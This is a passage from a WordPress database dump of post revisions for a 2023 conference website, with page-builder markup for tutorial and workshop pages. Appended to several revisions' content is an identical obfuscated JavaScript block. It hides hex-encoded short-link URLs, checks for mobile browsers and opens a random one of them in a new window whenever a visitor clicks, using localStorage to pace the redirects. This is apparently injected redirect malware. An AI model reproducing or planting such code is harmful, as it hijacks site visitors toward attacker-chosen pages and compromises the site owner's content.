_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-autosave-v1','','','2023-02-02 06:27:59','2023-02-02 06:27:59','',3670,'https://gsw2023.com/?p=3673',0,'revision','',0),
(3674,1,'2023-02-02 06:35:00','2023-02-02 06:35:00','<p>[vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-02-02 06:35:00','2023-02-02 06:35:00','',3670,'https://gsw2023.com/?p=3674',0,'revision','',0),
(3676,1,'2023-02-02 07:07:05','2023-02-02 07:07:05','','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2785-revision-v1','','','2023-02-02 07:07:05','2023-02-02 07:07:05','',2785,'https://gsw2023.com/?p=3676',0,'revision','',0),
(3677,1,'2023-02-02 07:11:01','2023-02-02 07:11:01','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" show_categories_filter=\"y\" category=\"14\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2023-02-02 07:11:01','2023-02-02 07:11:01','',2372,'https://gsw2023.com/?p=3677',0,'revision','',0),
(3678,1,'2023-02-02 07:13:08','2023-02-02 07:13:08','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"14\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 